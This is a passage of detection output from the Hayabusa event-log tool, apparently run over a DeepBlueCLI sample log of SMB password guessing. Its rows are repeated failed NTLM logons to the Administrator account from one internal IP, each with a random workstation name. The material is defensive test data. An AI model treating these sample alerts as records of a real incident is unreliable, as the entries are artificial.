+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QUvFvCM6AJhKjXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NiVgC8oJ5W2Xr3t0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hXfhdrbLnNOGDqy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcjMGbrHQHxIhSSh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDYPTYHHKAe39GjM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PF3H6LE6MqFjVWx | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LLTReOoxRa7UAhT3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqtqwAPBiBfaHNpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmisFXzDpOILUhIX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W5UHqVVAYK08FWit | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKHLHN59FDnD92Sm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ohAKPRGvg1JCQ91y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxdcrng84HEG39nJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lFGXFxHPbxDTGmiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tyFnafBgzoLQWTQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2IjLjxkd2pX4moFy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9vqYC4KotCYTcQv5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qtHcYFIOHglQFb60 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmiHIQrpsAVRJtdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4TdkChjMAviJ6jr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPIGU1rBk0F5cG9P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ScynGWKK3CtoUsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0E4JAuxC8MuuGfnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4aDJtqsUWKyuDqBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCFrEHUgqCtKPybS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ftrEBfaLGbboV8D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: thle3slH6gZYllyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PcEnabS7oj98WI0e | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EBqGp9CD4A9PsyLk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iil8dQlzMCkKRNUb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nDBqxF9bmNNjNdsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJNBRV3BRVEN8hmG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OGl1Tbdw7PDvVsRR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uspHTc4JwnjjZQti | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Exq3nfy1LeFOPcA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vdFC4g7vsLO0zOzL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HpdCohLheoqQ6DXw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHS3sclMwgHuH8rE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sNSheImuQwgOEH5g | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GX5y374mlYYXbAB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaFRL6q9KQY5bFHZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrkEyJmfLiSrvQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fd1vJiJa3pdjqdQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RVrZl3LOIa7VLhT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TKR8KbyQkwRX1qTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GY22XuDxbE5lvEra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4AntiX3j9HLHcOOq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIvMbod41WeNADy5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0UL4lb3CCrv7YfGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OyRktDjPqFyrdSTQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKEGmAH8Wbc7f3jC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06Dfi4lO2Vdw3gCr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29eXmenUTACkAHKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Zq7Gl6hnKDJJqFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jKENlWYt6m78taZR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 822SUU2Hg6w6AqQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bROU0Mk9Z4yEq323 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKfVPleDpLLqkuKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NGWVqbchMitnLVYT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7K9vifU9lWwpP9J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIgKYj210JfICJXv | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jisuKilPQivTV8yE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hckyoom0XnqpRzK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: De0l6qgcuhMERjMY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SSa7pylPWn8jl2Ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ol9OntO4hqidlNUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kXOBF0ZWLxMauHuT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVBFJltkR5vnmpYD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kHVXEHq9zNYdfTpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OIw3BxmLsfwDXXFg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hhgRhjnhkRJus4fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xz78guWXrekEvuFT | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 04wNT26RJmriQrfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XmbuuymdSpfNldt2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yqJarBVOImq5Tn2p | IP Addr: 192.168.198.149 | AuthPackage: 